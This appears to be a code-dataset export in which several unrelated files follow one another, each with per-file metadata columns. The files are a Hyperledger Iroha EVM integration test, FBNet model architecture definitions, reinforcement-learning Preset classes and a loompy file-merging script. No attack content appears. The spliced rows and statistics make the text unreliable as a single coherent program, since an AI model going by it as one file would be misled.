dc565b9050818103610100830152610f968184610cdc565b90509a9950505050505050505050565b60006020820190508181036000830152610fbf81610d15565b9050919050565b6000610fd0610fe1565b9050610fdc82826110d3565b919050565b6000604051905090565b600067ffffffffffffffff82111561100657611005611104565b5b61100f82611147565b9050602081019050919050565b600081519050919050565b600081519050919050565b600082825260208201905092915050565b600081905092915050565b600082825260208201905092915050565b600061106a82611071565b9050919050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b82818337600083830152505050565b60005b838110156110be5780820151818401526020810190506110a3565b838111156110cd576000848401525b50505050565b6110dc82611147565b810181811067ffffffffffffffff821117156110fb576110fa611104565b5b80604052505050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b600080fd5b600080fd5b600080fd5b600080fd5b6000601f19601f8301169050919050565b7f4572726f722063616c6c696e67207365727669636520636f6e7472616374206660008201527f756e6374696f6e0000000000000000000000000000000000000000000000000060208201525056fea26469706673582212205e584d5874226b894bcbcd685c22e9010a188385180559c526ec96dc806b313264736f6c63430008070033"
"""Bytecode was generated using remix editor https://remix.ethereum.org/ from file get_transactions.sol. """
tx = iroha.transaction(
[iroha.command("CallEngine", caller = ADMIN_ACCOUNT_ID, input = bytecode)]
)
return send_transaction_and_print_status(tx)
@integration_helpers.trace
def get_account_transactions(address, first_tx_height = None, last_tx_height = None, ordering_str = None):
params = integration_helpers.get_first_four_bytes_of_keccak(b'getAccountTransactions(string,string,string,string,string,string,string,string)')
no_of_param = 8
for x in range(no_of_param):
params = params + integration_helpers.left_padded_address_of_param(x, no_of_param)
params = params + integration_helpers.argument_encoding(ADMIN_ACCOUNT_ID) # account id
params = params + integration_helpers.argument_encoding('1') # page size
params = params + integration_helpers.argument_encoding('') # first_tx_hash
params = params + integration_helpers.argument_encoding('') # first_tx_time
params = params + integration_helpers.argument_encoding('') # last_tx_time
params = params + integration_helpers.argument_encoding(str(first_tx_height)) # first_tx_height
params = params + integration_helpers.argument_encoding(str(last_tx_height)) # last_tx_height
params = params + integration_helpers.argument_encoding(ordering_str) # ordering
tx = iroha.transaction(
[
iroha.command(
"CallEngine", caller=ADMIN_ACCOUNT_ID, callee = address, input = params
)
]
)
return send_transaction_and_print_status(tx)
def get_transactions(address, txs_hashes):
params = integration_helpers.get_first_four_bytes_of_keccak(b'getTransactions(string)')
no_of_param = 1
for x in range(no_of_param):
params = params + integration_helpers.left_padded_address_of_param(x, no_of_param)
params = params + integration_helpers.argument_encoding(txs_hashes) # tx hashes
tx = iroha.transaction(
[
iroha.command(
"CallEngine", caller=ADMIN_ACCOUNT_ID, callee = address, input = params
)
]
)
return send_transaction_and_print_status(tx)
@integration_helpers.trace
def make_initial_transactions():
for i in range(4):
tx = iroha.transaction([
iroha.command('AddAssetQuantity',
asset_id = COIN, amount = '1000.00')
])
send_transaction_and_print_status(tx)
# pending transaction
tx1 = iroha.transaction([
iroha.command('AddAssetQuantity',
asset_id = COIN, amount = '1000.00')
],quorum=8)
send_transaction_and_print_status(tx1)
tx_tms = tx.payload.reduced_payload.created_time
first_time, last_time = tx_tms - 1, tx_tms + 1
first_time_pending = tx1.payload.reduced_payload.created_time-1
last_time_pending = tx1.payload.reduced_payload.created_time+1
# transfer assets
tx1 = iroha.transaction([
iroha.command('TransferAsset', src_account_id = ADMIN_ACCOUNT_ID,
dest_account_id = 'test@test', asset_id = COIN,
amount = '1000.00')
])
hex_hash = send_transaction_and_print_status(tx1)
return hex_hash, first_time, last_time, first_time_pending, last_time_pending
tx_hash, first_time, last_time, ft_p, lt_p = make_initial_transactions()
hash = create_contract()
address = integration_helpers.get_engine_receipts_address(hash)
print('get account transactions results: ')
hash = get_account_transactions(address, 4, 5, '[{"Field": "kCreatedTime", "Direction": "kDescending"},{"Field": "kPosition", "Direction": "kDescending"}]')
integration_helpers.get_engine_receipts_result(hash)
print('get transactions result')
tx_hashes = json.dumps([tx_hash.decode()])
hash = get_transactions(address, tx_hashes)
integration_helpers.get_engine_receipts_result(hash)
print('done')
| 119.048
| 9,395
| 0.901485
| 692
| 14,881
| 19.057803
| 0.236994
| 0.028662
| 0.023658
| 0.025023
| 0.135502
| 0.122308
| 0.109873
| 0.105778
| 0.074234
| 0.067106
| 0
| 0.522918
| 0.063168
| 14,881
| 125
| 9,396
| 119.048
| 0.423069
| 0.015053
| 0
| 0.274336
| 0
| 0.00885
| 0.687878
| 0.658228
| 0
| 1
| 0
| 0
| 0
| 1
| 0.044248
| false
| 0
| 0.088496
| 0
| 0.176991
| 0.115044
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
89bc29a2c78c3b4915df7a11c68cc9ed23c43e32
| 7,814
|
py
|
Python
|
models/imagenet/arch/fbnet_v2/fbnet_modeldef_cls_dmasking.py
|
a1004123217/pytorch-mobile
|
97974af3259a2073efbc334d57841efbd3eaadfb
|
[
"MIT"
] | null | null | null |
models/imagenet/arch/fbnet_v2/fbnet_modeldef_cls_dmasking.py
|
a1004123217/pytorch-mobile
|
97974af3259a2073efbc334d57841efbd3eaadfb
|
[
"MIT"
] | null | null | null |
models/imagenet/arch/fbnet_v2/fbnet_modeldef_cls_dmasking.py
|
a1004123217/pytorch-mobile
|
97974af3259a2073efbc334d57841efbd3eaadfb
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
from .fbnet_modeldef_cls import MODEL_ARCH
from .modeldef_utils import _ex, e1, e6
BASIC_ARGS = {}
IRF_CFG = {"less_se_channels": False}
MODEL_ARCH_DMASKING_NET = {
"dmasking_f1": {
# nparams: 5.998952, nflops 55.747008
"input_size": 128,
"basic_args": BASIC_ARGS,
"blocks": [
# [c, s, n, ...]
# stage 0
[["conv_k3_hs", 8, 2, 1]],
# stage 1
[["ir_k5", 8, 1, 1, e1, IRF_CFG]],
# stage 2
[
["ir_k5", 24, 2, 1, _ex(5.4566), IRF_CFG],
["ir_k5", 24, 1, 1, _ex(4.7912), IRF_CFG],
],
# stage 3
[
["ir_k5_sehsig", 32, 2, 1, _ex(5.3501), IRF_CFG],
["ir_k5_sehsig", 24, 1, 1, _ex(4.5379), IRF_CFG],
],
# stage 4
[
["ir_k5_hs", 56, 2, 1, _ex(5.7133), IRF_CFG],
["ir_k3_hs", 56, 1, 1, _ex(4.1212), IRF_CFG],
["ir_k3_sehsig_hs", 56, 1, 1, _ex(5.1246), IRF_CFG],
["skip", 80, 1, 1, _ex(5.0333), IRF_CFG],
["ir_k5_sehsig_hs", 80, 1, 1, _ex(4.5070), IRF_CFG],
["ir_k5_sehsig_hs", 80, 1, 1, _ex(1.7712), IRF_CFG],
],
# stage 5
[
["ir_k3_sehsig_hs", 144, 2, 1, _ex(4.5685), IRF_CFG],
["ir_k5_sehsig_hs", 144, 1, 1, _ex(5.8400), IRF_CFG],
["ir_k5_sehsig_hs", 144, 1, 1, _ex(6.8754), IRF_CFG],
["skip", 224, 1, 1, _ex(6.5245), IRF_CFG],
],
# stage 6
[["ir_pool_hs", 1600, 1, 1, e6]],
],
},
"dmasking_f4": {
# nparams: 6.993656, nflops 234.689136
"input_size": 224,
"basic_args": BASIC_ARGS,
"blocks": [
# [c, s, n, ...]
# stage 0
[["conv_k3_hs", 16, 2, 1]],
# stage 1
[["ir_k3", 16, 1, 1, e1, IRF_CFG]],
# stage 2
[
["ir_k5", 24, 2, 1, _ex(5.4566), IRF_CFG],
["ir_k5", 24, 1, 1, _ex(1.7912), IRF_CFG],
["ir_k5", 24, 1, 1, _ex(1.7912), IRF_CFG],
],
# stage 3
[
["ir_k5_sehsig", 32, 2, 1, _ex(5.3501), IRF_CFG],
["ir_k5_sehsig", 32, 1, 1, _ex(3.5379), IRF_CFG],
["ir_k5_sehsig", 32, 1, 1, _ex(4.5379), IRF_CFG],
["ir_k5_sehsig", 32, 1, 1, _ex(4.5379), IRF_CFG],
],
# stage 4
[
["ir_k5_hs", 64, 2, 1, _ex(5.7133), IRF_CFG],
["ir_k3_hs", 64, 1, 1, _ex(2.1212), IRF_CFG],
["skip", 64, 1, 1, _ex(3.1246), IRF_CFG],
["ir_k3_hs", 104, 1, 1, _ex(5.0333), IRF_CFG],
["ir_k5_sehsig_hs", 104, 1, 1, _ex(2.5070), IRF_CFG],
["ir_k5_sehsig_hs", 104, 1, 1, _ex(1.7712), IRF_CFG],
["ir_k5_sehsig_hs", 112, 1, 1, _ex(3.7712), IRF_CFG],
],
# stage 5
[
["ir_k3_sehsig_hs", 184, 2, 1, _ex(5.5685), IRF_CFG],
["ir_k5_sehsig_hs", 184, 1, 1, _ex(2.8400), IRF_CFG],
["ir_k5_sehsig_hs", 184, 1, 1, _ex(4.8754), IRF_CFG],
["skip", 224, 1, 1, _ex(6.5245), IRF_CFG],
],
# stage 6
[["ir_pool_hs", 1984, 1, 1, e6]],
],
},
"dmasking_l2_hs": {
# nparams: 8.49 nflops: 422.04
"input_size": 256,
"basic_args": BASIC_ARGS,
"blocks": [
[["conv_k3_hs", 16, 2, 1]],
[["ir_k3_hs", 16, 1, 1, e1, IRF_CFG]],
[
["ir_k5_hs", 24, 2, 1, _ex(5.4566), IRF_CFG],
["ir_k5_hs", 24, 1, 1, _ex(1.7912), IRF_CFG],
["ir_k3_hs", 24, 1, 1, _ex(1.7912), IRF_CFG],
["ir_k5_hs", 24, 1, 1, _ex(1.7912), IRF_CFG],
],
[
["ir_k5_sehsig", 40, 2, 1, _ex(5.3501), IRF_CFG],
["ir_k5_sehsig", 32, 1, 1, _ex(3.5379), IRF_CFG],
["ir_k5_sehsig", 32, 1, 1, _ex(4.5379), IRF_CFG],
["ir_k5_sehsig", 32, 1, 1, _ex(4.5379), IRF_CFG],
],
[
["ir_k5_hs", 64, 2, 1, _ex(5.7133), IRF_CFG],
["ir_k3_hs", 64, 1, 1, _ex(2.1212), IRF_CFG],
["skip", 64, 1, 1, _ex(3.1246), IRF_CFG],
["ir_k3_hs", 64, 1, 1, _ex(3.1246), IRF_CFG],
["ir_k3_hs", 112, 1, 1, _ex(5.0333), IRF_CFG],
["ir_k5_sehsig_hs", 112, 1, 1, _ex(2.5070), IRF_CFG],
["ir_k5_sehsig_hs", 112, 1, 1, _ex(1.7712), IRF_CFG],
["ir_k5_sehsig_hs", 112, 1, 1, _ex(2.7712), IRF_CFG],
["ir_k5_sehsig_hs", 112, 1, 1, _ex(3.7712), IRF_CFG],
["ir_k5_sehsig_hs", 112, 1, 1, _ex(3.7712), IRF_CFG],
],
[
["ir_k3_sehsig_hs", 184, 2, 1, _ex(5.5685), IRF_CFG],
["ir_k5_sehsig_hs", 184, 1, 1, _ex(2.8400), IRF_CFG],
["ir_k5_sehsig_hs", 184, 1, 1, _ex(2.8400), IRF_CFG],
["ir_k5_sehsig_hs", 184, 1, 1, _ex(4.8754), IRF_CFG],
["ir_k5_sehsig_hs", 184, 1, 1, _ex(4.8754), IRF_CFG],
["skip", 224, 1, 1, _ex(6.5245), IRF_CFG],
],
[["ir_pool_hs", 1984, 1, 1, e6]],
],
},
"dmasking_l3": {
# nparams: 9.402096, nflops 750.681952
"input_size": 288,
"basic_args": BASIC_ARGS,
"blocks": [
# [c, s, n, ...]
# stage 0
[["conv_k3_hs", 24, 2, 1]],
# stage 1
[["ir_k3", 24, 1, 1, e1, IRF_CFG]],
# stage 2
[
["ir_k5", 32, 2, 1, _ex(5.4566), IRF_CFG],
["ir_k5", 32, 1, 1, _ex(1.7912), IRF_CFG],
["ir_k3", 32, 1, 1, _ex(1.7912), IRF_CFG],
["ir_k5", 32, 1, 1, _ex(1.7912), IRF_CFG],
],
# stage 3
[
["ir_k5_sehsig", 48, 2, 1, _ex(5.3501), IRF_CFG],
["ir_k5_sehsig", 40, 1, 1, _ex(3.5379), IRF_CFG],
["ir_k5_sehsig", 40, 1, 1, _ex(4.5379), IRF_CFG],
["ir_k5_sehsig", 40, 1, 1, _ex(4.5379), IRF_CFG],
],
# stage 4
[
["ir_k5_hs", 72, 2, 1, _ex(5.7133), IRF_CFG],
["ir_k3_hs", 72, 1, 1, _ex(2.1212), IRF_CFG],
["skip", 72, 1, 1, _ex(3.1246), IRF_CFG],
["ir_k3_hs", 72, 1, 1, _ex(3.1246), IRF_CFG],
["ir_k3_hs", 120, 1, 1, _ex(5.0333), IRF_CFG],
["ir_k5_sehsig_hs", 120, 1, 1, _ex(2.5070), IRF_CFG],
["ir_k5_sehsig_hs", 120, 1, 1, _ex(1.7712), IRF_CFG],
["ir_k5_sehsig_hs", 120, 1, 1, _ex(2.7712), IRF_CFG],
["ir_k5_sehsig_hs", 120, 1, 1, _ex(3.7712), IRF_CFG],
["ir_k5_sehsig_hs", 120, 1, 1, _ex(3.7712), IRF_CFG],
["ir_k5_sehsig_hs", 120, 1, 1, _ex(3.7712), IRF_CFG],
],
# stage 5
[
["ir_k3_sehsig_hs", 192, 2, 1, _ex(5.5685), IRF_CFG],
["ir_k5_sehsig_hs", 192, 1, 1, _ex(2.8400), IRF_CFG],
["ir_k5_sehsig_hs", 192, 1, 1, _ex(2.8400), IRF_CFG],
["ir_k5_sehsig_hs", 192, 1, 1, _ex(4.8754), IRF_CFG],
["ir_k5_sehsig_hs", 192, 1, 1, _ex(4.8754), IRF_CFG],
["skip", 240, 1, 1, _ex(6.5245), IRF_CFG],
],
# stage 6
[["ir_pool_hs", 1984, 1, 1, e6]],
],
},
}
MODEL_ARCH.register_dict(MODEL_ARCH_DMASKING_NET)
| 40.910995
| 70
| 0.42795
| 1,148
| 7,814
| 2.5723
| 0.099303
| 0.174738
| 0.088046
| 0.162547
| 0.838469
| 0.818151
| 0.789705
| 0.785303
| 0.768033
| 0.740264
| 0
| 0.211146
| 0.391477
| 7,814
| 190
| 71
| 41.126316
| 0.409884
| 0.056565
| 0
| 0.5
| 0
| 0
| 0.156088
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.012821
| 0
| 0.012821
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
7f5183a9881a94d6ca082e7c0b6b78e673ef8516
| 73
|
py
|
Python
|
device/controller/__init__.py
|
ZJU-Robotics-Lab/CICT
|
ff873a03ab03d9113b8db96d26246939bb5da0d4
|
[
"MIT"
] | 12
|
2021-02-09T05:08:36.000Z
|
2022-02-24T07:51:30.000Z
|
device/controller/__init__.py
|
ZJU-Robotics-Lab/CICT
|
ff873a03ab03d9113b8db96d26246939bb5da0d4
|
[
"MIT"
] | null | null | null |
device/controller/__init__.py
|
ZJU-Robotics-Lab/CICT
|
ff873a03ab03d9113b8db96d26246939bb5da0d4
|
[
"MIT"
] | 6
|
2021-03-30T06:30:13.000Z
|
2022-03-01T14:15:00.000Z
|
from .controller import *
from .xbox import *
from .passive_xbox import *
| 24.333333
| 27
| 0.767123
| 10
| 73
| 5.5
| 0.5
| 0.363636
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.150685
| 73
| 3
| 27
| 24.333333
| 0.887097
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
7fbda9658a2a02ae0c961928cb2342d76c03e908
| 3,851
|
py
|
Python
|
all/presets/preset.py
|
kcorder/autonomous-learning-library
|
0266195fa47564e51a32087bc007bff6dda5e263
|
[
"MIT"
] | 584
|
2019-07-10T20:21:55.000Z
|
2022-03-30T22:47:57.000Z
|
all/presets/preset.py
|
kcorder/autonomous-learning-library
|
0266195fa47564e51a32087bc007bff6dda5e263
|
[
"MIT"
] | 104
|
2019-03-27T14:08:22.000Z
|
2022-01-06T18:16:23.000Z
|
all/presets/preset.py
|
kcorder/autonomous-learning-library
|
0266195fa47564e51a32087bc007bff6dda5e263
|
[
"MIT"
] | 66
|
2019-07-11T00:59:06.000Z
|
2022-03-15T05:22:57.000Z
|
from abc import ABC, abstractmethod
import torch
class Preset(ABC):
"""
A Preset Agent factory.
This class allows the user to instantiate preconfigured Agents and test Agents.
All Agents constructed by the Preset share a network model and parameters.
However, other objects, such as ReplayBuffers, are independently created for each Agent.
The Preset can be saved and loaded from disk.
"""
def __init__(self, name, device, hyperparameters):
self.name = name
self.device = device
self.hyperparameters = hyperparameters
@abstractmethod
def agent(self, writer=None, train_steps=float('inf')):
"""
Instantiate a training-mode Agent with the existing model.
Args:
writer (all.logging.Writer, optional): Coefficient for the entropy term in the total loss.
train_steps (int, optional): The number of steps for which the agent will be trained.
Returns:
all.agents.Agent: The instantiated Agent.
"""
pass
@abstractmethod
def test_agent(self):
"""
Instansiate a test-mode Agent with the existing model.
Returns:
all.agents.Agent: The instantiated test Agent.
"""
pass
def save(self, filename):
"""
Save the preset and the contained model to disk.
The preset can later be loaded using torch.load(filename), allowing
a test mode agent to be instantiated for evaluation or other purposes.
Args:
filename (str): The path where the preset should be saved.
"""
return torch.save(self, filename)
class ParallelPreset(ABC):
"""
A Preset ParallelAgent factory.
This is the ParallelAgent version of all.presets.Preset.
This class allows the user to instantiate preconfigured ParallelAgents and test Agents.
All Agents constructed by the ParallelPreset share a network model and parameters.
However, other objects, such as ReplayBuffers, are independently created for each Agent.
The ParallelPreset can be saved and loaded from disk.
"""
def __init__(self, name, device, hyperparameters):
self.name = name
self.device = device
self.hyperparameters = hyperparameters
@abstractmethod
def agent(self, writer=None, train_steps=float('inf')):
"""
Instantiate a training-mode ParallelAgent with the existing model.
Args:
writer (all.logging.Writer, optional): Coefficient for the entropy term in the total loss.
train_steps (int, optional): The number of steps for which the agent will be trained.
Returns:
all.agents.ParallelAgent: The instantiated Agent.
"""
pass
@abstractmethod
def test_agent(self):
"""
Instantiate a test-mode Agent with the existing model.
See also: ParallelPreset.parallel_test_agent()
Returns:
all.agents.Agent: The instantiated test Agent.
"""
pass
@abstractmethod
def parallel_test_agent(self):
"""
Instantiate a test-mode ParallelAgent with the existing model.
See also: ParallelPreset.test_agent()
Returns:
all.agents.ParallelAgent: The instantiated test ParallelAgent.
"""
pass
@property
def n_envs(self):
return self.hyperparameters['n_envs']
def save(self, filename):
"""
Save the preset and the contained model to disk.
The preset can later be loaded using torch.load(filename), allowing
a test mode agent to be instantiated for evaluation or other purposes.
Args:
filename (str): The path where the preset should be saved.
"""
return torch.save(self, filename)
| 31.056452
| 102
| 0.648922
| 459
| 3,851
| 5.398693
| 0.228758
| 0.029056
| 0.030266
| 0.040355
| 0.860775
| 0.853511
| 0.815981
| 0.773204
| 0.676352
| 0.59322
| 0
| 0
| 0.284601
| 3,851
| 123
| 103
| 31.308943
| 0.899456
| 0.60322
| 0
| 0.764706
| 0
| 0
| 0.010989
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.294118
| false
| 0.147059
| 0.058824
| 0.029412
| 0.5
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
125a11089f8476990e0c8c617753bcc008554b8d
| 6,886
|
py
|
Python
|
unused_or_abandoned/splicing/combine_velocyto_outputs.py
|
molgenis/1M-cells
|
a7ed82b5b1b308f98b7735d559abb14d95694cbb
|
[
"BSD-2-Clause"
] | 1
|
2021-12-01T10:38:49.000Z
|
2021-12-01T10:38:49.000Z
|
unused_or_abandoned/splicing/combine_velocyto_outputs.py
|
molgenis/1M-cells
|
a7ed82b5b1b308f98b7735d559abb14d95694cbb
|
[
"BSD-2-Clause"
] | null | null | null |
unused_or_abandoned/splicing/combine_velocyto_outputs.py
|
molgenis/1M-cells
|
a7ed82b5b1b308f98b7735d559abb14d95694cbb
|
[
"BSD-2-Clause"
] | null | null | null |
import loompy as loompy
looms_v2 = ['/groups/umcg-bios/tmp01/projects/1M_cells_scRNAseq/ongoing/splicing/lanes/HG19/180920_lane1/velocyto/180920_lane1.loom', '/groups/umcg-bios/tmp01/projects/1M_cells_scRNAseq/ongoing/splicing/lanes/HG19/180925_lane1/velocyto/180925_lane1.loom', '/groups/umcg-bios/tmp01/projects/1M_cells_scRNAseq/ongoing/splicing/lanes/HG19/180925_lane2/velocyto/180925_lane2.loom', '/groups/umcg-bios/tmp01/projects/1M_cells_scRNAseq/ongoing/splicing/lanes/HG19/180926_lane1/velocyto/180926_lane1.loom', '/groups/umcg-bios/tmp01/projects/1M_cells_scRNAseq/ongoing/splicing/lanes/HG19/180926_lane2/velocyto/180926_lane2.loom', '/groups/umcg-bios/tmp01/projects/1M_cells_scRNAseq/ongoing/splicing/lanes/HG19/180927_lane1/velocyto/180927_lane1.loom', '/groups/umcg-bios/tmp01/projects/1M_cells_scRNAseq/ongoing/splicing/lanes/HG19/180927_lane2/velocyto/180927_lane2.loom', '/groups/umcg-bios/tmp01/projects/1M_cells_scRNAseq/ongoing/splicing/lanes/HG19/180928_lane1/velocyto/180928_lane1.loom', '/groups/umcg-bios/tmp01/projects/1M_cells_scRNAseq/ongoing/splicing/lanes/HG19/180928_lane2/velocyto/180928_lane2.loom', '/groups/umcg-bios/tmp01/projects/1M_cells_scRNAseq/ongoing/splicing/lanes/HG19/181003_lane1/velocyto/181003_lane1.loom', '/groups/umcg-bios/tmp01/projects/1M_cells_scRNAseq/ongoing/splicing/lanes/HG19/181003_lane2/velocyto/181003_lane2.loom', '/groups/umcg-bios/tmp01/projects/1M_cells_scRNAseq/ongoing/splicing/lanes/HG19/181003_lane3/velocyto/181003_lane3.loom', '/groups/umcg-bios/tmp01/projects/1M_cells_scRNAseq/ongoing/splicing/lanes/HG19/181011_lane1/velocyto/181011_lane1.loom', '/groups/umcg-bios/tmp01/projects/1M_cells_scRNAseq/ongoing/splicing/lanes/HG19/181011_lane2/velocyto/181011_lane2.loom', '/groups/umcg-bios/tmp01/projects/1M_cells_scRNAseq/ongoing/splicing/lanes/HG19/181022_lane1/velocyto/181022_lane1.loom', '/groups/umcg-bios/tmp01/projects/1M_cells_scRNAseq/ongoing/splicing/lanes/HG19/181022_lane2/velocyto/181022_lane2.loom', '/groups/umcg-bios/tmp01/projects/1M_cells_scRNAseq/ongoing/splicing/lanes/HG19/181023_lane1/velocyto/181023_lane1.loom', '/groups/umcg-bios/tmp01/projects/1M_cells_scRNAseq/ongoing/splicing/lanes/HG19/181023_lane2/velocyto/181023_lane2.loom', '/groups/umcg-bios/tmp01/projects/1M_cells_scRNAseq/ongoing/splicing/lanes/HG19/181024_lane1/velocyto/181024_lane1.loom', '/groups/umcg-bios/tmp01/projects/1M_cells_scRNAseq/ongoing/splicing/lanes/HG19/181024_lane2/velocyto/181024_lane2.loom', '/groups/umcg-bios/tmp01/projects/1M_cells_scRNAseq/ongoing/splicing/lanes/HG19/181024_lane3/velocyto/181024_lane3.loom', '/groups/umcg-bios/tmp01/projects/1M_cells_scRNAseq/ongoing/splicing/lanes/HG19/181030_lane1/velocyto/181030_lane1.loom', '/groups/umcg-bios/tmp01/projects/1M_cells_scRNAseq/ongoing/splicing/lanes/HG19/181030_lane2/velocyto/181030_lane2.loom', '/groups/umcg-bios/tmp01/projects/1M_cells_scRNAseq/ongoing/splicing/lanes/HG19/181106_lane2/velocyto/181106_lane2.loom', '/groups/umcg-bios/tmp01/projects/1M_cells_scRNAseq/ongoing/splicing/lanes/HG19/181107_lane1/velocyto/181107_lane1.loom', '/groups/umcg-bios/tmp01/projects/1M_cells_scRNAseq/ongoing/splicing/lanes/HG19/181107_lane2/velocyto/181107_lane2.loom', '/groups/umcg-bios/tmp01/projects/1M_cells_scRNAseq/ongoing/splicing/lanes/HG19/181108_lane1/velocyto/181108_lane1.loom', '/groups/umcg-bios/tmp01/projects/1M_cells_scRNAseq/ongoing/splicing/lanes/HG19/181108_lane2/velocyto/181108_lane2.loom', '/groups/umcg-bios/tmp01/projects/1M_cells_scRNAseq/ongoing/splicing/lanes/HG19/181122_lane1/velocyto/181122_lane1.loom', '/groups/umcg-bios/tmp01/projects/1M_cells_scRNAseq/ongoing/splicing/lanes/HG19/181122_lane2/velocyto/181122_lane2.loom', '/groups/umcg-bios/tmp01/projects/1M_cells_scRNAseq/ongoing/splicing/lanes/HG19/181213_lane1/velocyto/181213_lane1.loom', '/groups/umcg-bios/tmp01/projects/1M_cells_scRNAseq/ongoing/splicing/lanes/HG19/181213_lane2/velocyto/181213_lane2.loom', '/groups/umcg-bios/tmp01/projects/1M_cells_scRNAseq/ongoing/splicing/lanes/HG19/181213_lane3/velocyto/181213_lane3.loom', '/groups/umcg-bios/tmp01/projects/1M_cells_scRNAseq/ongoing/splicing/lanes/HG19/181214_lane1/velocyto/181214_lane1.loom', '/groups/umcg-bios/tmp01/projects/1M_cells_scRNAseq/ongoing/splicing/lanes/HG19/181214_lane2/velocyto/181214_lane2.loom', '/groups/umcg-bios/tmp01/projects/1M_cells_scRNAseq/ongoing/splicing/lanes/HG19/181218_lane1/velocyto/181218_lane1.loom', '/groups/umcg-bios/tmp01/projects/1M_cells_scRNAseq/ongoing/splicing/lanes/HG19/181218_lane2/velocyto/181218_lane2.loom', '/groups/umcg-bios/tmp01/projects/1M_cells_scRNAseq/ongoing/splicing/lanes/HG19/181219_lane1/velocyto/181219_lane1.loom', '/groups/umcg-bios/tmp01/projects/1M_cells_scRNAseq/ongoing/splicing/lanes/HG19/181219_lane2/velocyto/181219_lane2.loom', '/groups/umcg-bios/tmp01/projects/1M_cells_scRNAseq/ongoing/splicing/lanes/HG19/181219_lane3/velocyto/181219_lane3.loom']
loom_v2_merged = '/groups/umcg-bios/tmp01/projects/1M_cells_scRNAseq/ongoing/splicing/objects/loom_v2_UT_CA_and_others.loom'
loompy.combine(looms_v2, loom_v2_merged, key="Accession")
looms_v3 = ['/groups/umcg-bios/tmp01/projects/1M_cells_scRNAseq/ongoing/splicing/lanes/HG19/190109_lane1/velocyto/190109_lane1.loom', '/groups/umcg-bios/tmp01/projects/1M_cells_scRNAseq/ongoing/splicing/lanes/HG19/190109_lane2/velocyto/190109_lane2.loom', '/groups/umcg-bios/tmp01/projects/1M_cells_scRNAseq/ongoing/splicing/lanes/HG19/190110_lane1/velocyto/190110_lane1.loom', '/groups/umcg-bios/tmp01/projects/1M_cells_scRNAseq/ongoing/splicing/lanes/HG19/190115_lane1/velocyto/190115_lane1.loom', '/groups/umcg-bios/tmp01/projects/1M_cells_scRNAseq/ongoing/splicing/lanes/HG19/190115_lane2/velocyto/190115_lane2.loom', '/groups/umcg-bios/tmp01/projects/1M_cells_scRNAseq/ongoing/splicing/lanes/HG19/190122_lane1/velocyto/190122_lane1.loom', '/groups/umcg-bios/tmp01/projects/1M_cells_scRNAseq/ongoing/splicing/lanes/HG19/190123_lane2/velocyto/190123_lane2.loom', '/groups/umcg-bios/tmp01/projects/1M_cells_scRNAseq/ongoing/splicing/lanes/HG19/190124_lane1/velocyto/190124_lane1.loom', '/groups/umcg-bios/tmp01/projects/1M_cells_scRNAseq/ongoing/splicing/lanes/HG19/190124_lane2/velocyto/190124_lane2.loom', '/groups/umcg-bios/tmp01/projects/1M_cells_scRNAseq/ongoing/splicing/lanes/HG19/190130_lane1/velocyto/190130_lane1.loom', '/groups/umcg-bios/tmp01/projects/1M_cells_scRNAseq/ongoing/splicing/lanes/HG19/190130_lane2/velocyto/190130_lane2.loom', '/groups/umcg-bios/tmp01/projects/1M_cells_scRNAseq/ongoing/splicing/lanes/HG19/190204_lane1/velocyto/190204_lane1.loom', '/groups/umcg-bios/tmp01/projects/1M_cells_scRNAseq/ongoing/splicing/lanes/HG19/190204_lane2/velocyto/190204_lane2.loom']
loom_v3_merged = '/groups/umcg-bios/tmp01/projects/1M_cells_scRNAseq/ongoing/splicing/objects/loom_v3_UT_CA_and_others.loom'
loompy.combine(looms_v3, loom_v3_merged, key="Accession")
| 491.857143
| 4,891
| 0.850712
| 1,022
| 6,886
| 5.499022
| 0.05773
| 0.097865
| 0.137011
| 0.185943
| 0.794128
| 0.794128
| 0.794128
| 0.794128
| 0.781673
| 0.781673
| 0
| 0.150286
| 0.011473
| 6,886
| 13
| 4,892
| 529.692308
| 0.675334
| 0
| 0
| 0
| 0
| 7.857143
| 0.94133
| 0.938716
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.142857
| 0
| 0.142857
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
89e404fc515c54d3c3fc7ab651611d0f7ca9f7dd
| 8,482
|
py
|
Python
|
monk/system_check_tests/keras/test_update_copy_from.py
|
Shreyashwaghe/monk_v1
